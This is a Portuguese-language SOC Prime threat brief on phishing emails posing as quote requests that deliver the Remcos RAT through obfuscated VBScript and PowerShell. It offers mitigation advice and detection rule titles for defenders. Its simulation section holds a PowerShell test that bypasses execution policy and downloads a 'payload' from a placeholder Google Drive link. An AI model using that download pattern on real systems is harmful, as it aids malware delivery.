SOC Prime Bias: High

05 Oct 2026 16:41 UTC

E-mails Falsos de Pedidos de Cotação Usados em Ataques de Phishing com Malware

Author Photo
SOC Prime Team linkedin icon Seguir
E-mails Falsos de Pedidos de Cotação Usados em Ataques de Phishing com Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Agentes de ameaça estão distribuindo e-mails de phishing disfarçados como solicitações de cotações de projetos para entregar cargas maliciosas. A campanha usa VBScript para ocultar comandos PowerShell, que por fim recuperam uma carga útil em várias etapas e o Remcos RAT. O malware final suporta execução remota de comandos, registro de teclas e exfiltração de dados de sistemas comprometidos.

Investigação

O AhnLab Security Intelligence Center (ASEC) identificou uma campanha de phishing onde arquivos comprimidos contêm VBScripts ocultos. Pesquisadores descobriram um método de ofuscação que abusa do notepad.exe para reconstruir o nome do executável ‘powershell’ e utiliza substituição de strings baseada em tokens para comandos PowerShell. A carga útil em várias etapas também aproveita objetos COM para realizar o bypass de UAC.

Mitigação

Os usuários devem validar o domínio de e-mail do remetente e permanecer cautelosos ao abrir anexos ou hyperlinks inesperados. Organizações devem configurar filtragem de e-mail para bloquear extensões de arquivo suspeitas, como .vbs, .exe e .js. Os usuários também devem evitar inserir credenciais sensíveis em URLs não oficiais ou suspeitas recebidas por meio de e-mails não solicitados.

Resposta

Quando atividade maliciosa é detectada, verifique a legitimidade do e-mail original e investigue atividades de arquivo suspeitas dentro de %APPDATA%. Verifique a execução não autorizada de PowerShell e indicadores associados com o Remcos RAT. Isole sistemas comprometidos da rede para prevenir comunicação C2 adicional, atividade lateral e exfiltração de dados potencial.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

LOLBAS WScript / CScript (via process_creation)

Equipe da SOC Prime
01 de outubro de 2026

Possível Infiltração / Exfiltração / C2 de Dados via Serviços / Ferramentas de Terceiros (via dns_query)

Equipe da SOC Prime
01 de outubro de 2026

Possível Infiltração / Exfiltração / C2 de Dados via Serviços / Ferramentas de Terceiros (via dns)

Equipe da SOC Prime
01 de outubro de 2026

IOCs (HashMd5) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações

Regras de IA da SOC Prime
01 de outubro de 2026

IOCs (SourceIP) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações

Regras de IA da SOC Prime
01 de outubro de 2026

IOCs (DestinationIP) para detectar: Malware Phishing/Scam: Cuidado com e-mails de phishing disfarçados como solicitações de cotações

Regras de IA da SOC Prime
01 de outubro de 2026

Detectar Script PowerShell Conectando ao Servidor C2 [Conexão de Rede do Windows]

Regras de IA da SOC Prime
01 de outubro de 2026

Execução Maliciosa de PowerShell via Ofuscação VBScript [Windows Powershell]

Regras de IA da SOC Prime
01 de outubro de 2026

Execução de Simulação

  • Narrativa & Comandos do Ataque: Um atacante envia um e-mail de spearphishing contendo um link para um documento. Quando o usuário clica no link, é executado um comando PowerShell oculto projetado para extrair um script malicioso de um repositório do Google Drive. O atacante usa o export=download parâmetro para garantir que o arquivo seja baixado diretamente em vez de ser visualizado em um navegador. O objetivo é executar uma carga útil sem arquivo na memória para evadir antivírus baseado em disco. O comando é construído para acionar a regra de detecção específica direcionada a esse padrão de download.

  • Script de Teste de Regressão:

    # Simulação de download de arquivo do PowerShell de um Google Drive via padrão específico de URL
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Comandos de Limpeza:

    # Nenhum arquivo é escrito no disco nesta simulação específica,
    # mas interrompemos o processo se ainda estiver em execução.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue